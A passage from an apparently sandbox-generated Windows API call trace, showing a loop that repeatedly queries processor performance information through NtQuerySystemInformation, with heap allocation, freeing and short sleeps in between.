ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0297.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0297.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0297.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.126] Sleep (dwMilliseconds=0x110) [0297.138] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0297.138] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0297.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0297.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0297.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0297.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0297.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0297.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0297.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.142] Sleep (dwMilliseconds=0x110) [0297.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0297.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0297.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0297.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0297.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0297.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0297.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0297.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0297.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.163] Sleep (dwMilliseconds=0x110) [0297.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0297.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0297.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0297.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0297.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0297.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0297.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0297.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0297.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.175] Sleep (dwMilliseconds=0x110) [0297.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0297.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0297.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0297.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0297.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0297.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0297.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0297.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0297.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.191] Sleep (dwMilliseconds=0x110) [0297.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0297.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0297.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0297.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0297.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0297.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0297.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0297.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0297.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.206] Sleep (dwMilliseconds=0x110) [0297.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0297.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0297.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0297.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0297.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0297.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0297.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0297.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0297.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.222] Sleep (dwMilliseconds=0x110) [0297.231] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0297.231] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0297.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0297.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0297.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0297.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0297.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0297.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0297.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.234] Sleep (dwMilliseconds=0x110) [0297.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0297.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0297.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0297.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0297.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0297.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0297.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0297.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0297.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.254] Sleep (dwMilliseconds=0x110) [0297.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0297.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0297.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0297.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0297.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0297.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0297.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0297.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0297.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.270] Sleep (dwMilliseconds=0x110) [0297.278] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0297.278] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.279] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0297.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0297.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0297.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0297.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0297.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0297.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0297.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.285] Sleep (dwMilliseconds=0x110) [0297.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0297.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0297.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0297.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0297.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0297.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0297.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0297.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0297.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.301] Sleep (dwMilliseconds=0x110) [0297.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0297.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0297.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0297.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0297.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0297.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0297.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0297.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0297.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.317] Sleep (dwMilliseconds=0x110) [0297.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0297.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0297.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0297.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0297.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0297.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0297.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0297.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0297.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.333] Sleep (dwMilliseconds=0x110) [0297.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0297.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0297.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0297.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0297.378] 